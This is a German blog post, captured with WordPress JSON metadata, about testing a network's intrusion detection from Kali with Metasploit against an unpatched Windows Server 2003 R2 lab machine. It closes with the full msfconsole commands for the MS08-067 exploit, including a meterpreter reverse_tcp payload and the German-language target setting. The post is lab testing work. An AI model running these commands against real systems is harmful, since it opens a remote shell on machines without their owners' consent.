Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali \/ Metasploit herum experimentiert.<\/p>\n
Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet.<\/p>\n
Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz.<\/p>\n
Als Exploit bietet sich hier immer der MS08_067 an, da dieser in der Regel relativ zuverl\u00e4ssig „z\u00fcndet“.<\/p>\n
Jedoch leider nicht auf meinem Deutschen Server – hierf\u00fcr ist ggf. die dedizierte Angabe des Targets n\u00f6tig.<\/p>\n
Ohne die Angabe des Target st\u00fcrzt der Server Dienst am Ziel immer „nur“ ab – jedoch wird der Payload nicht ausgef\u00fchrt.<\/p>\n Mit Show Targets kann man sich alle M\u00f6glichkeiten anzeigen lassen – wobei hier das NX oder NO NX glaube ich eine entscheidende Rolle spielt \ud83d\ude42<\/p>\n\n\n","protected":false},"excerpt":{"rendered":" Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali \/ Metasploit herum experimentiert. Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet. Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz. Als Exploit bietet sich hier immer der MS08_067 an, da […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"enabled":false},"version":2}},"categories":[16],"tags":[74,44,75,34,26,71],"class_list":["post-2446","post","type-post","status-publish","format-standard","hentry","category-edv-probleme","tag-kali","tag-linux","tag-metasploit","tag-server-2003","tag-windows","tag-work"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/peux2-Ds","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=\/wp\/v2\/posts\/2446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2446"}],"version-history":[{"count":2,"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=\/wp\/v2\/posts\/2446\/revisions"}],"predecessor-version":[{"id":2448,"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=\/wp\/v2\/posts\/2446\/revisions\/2448"}],"wp:attachment":[{"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ewig-drohendes-versagen.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nmsfconsole -q
\nuse exploit\/windows\/smb\/ms08_067_netapi
\nset payload windows\/meterpreter\/reverse_tcp
\nset RHOST Ziel.IP
\nset LHOST Quell.IP
\nset target 66
\nexploit<\/code><\/p>\n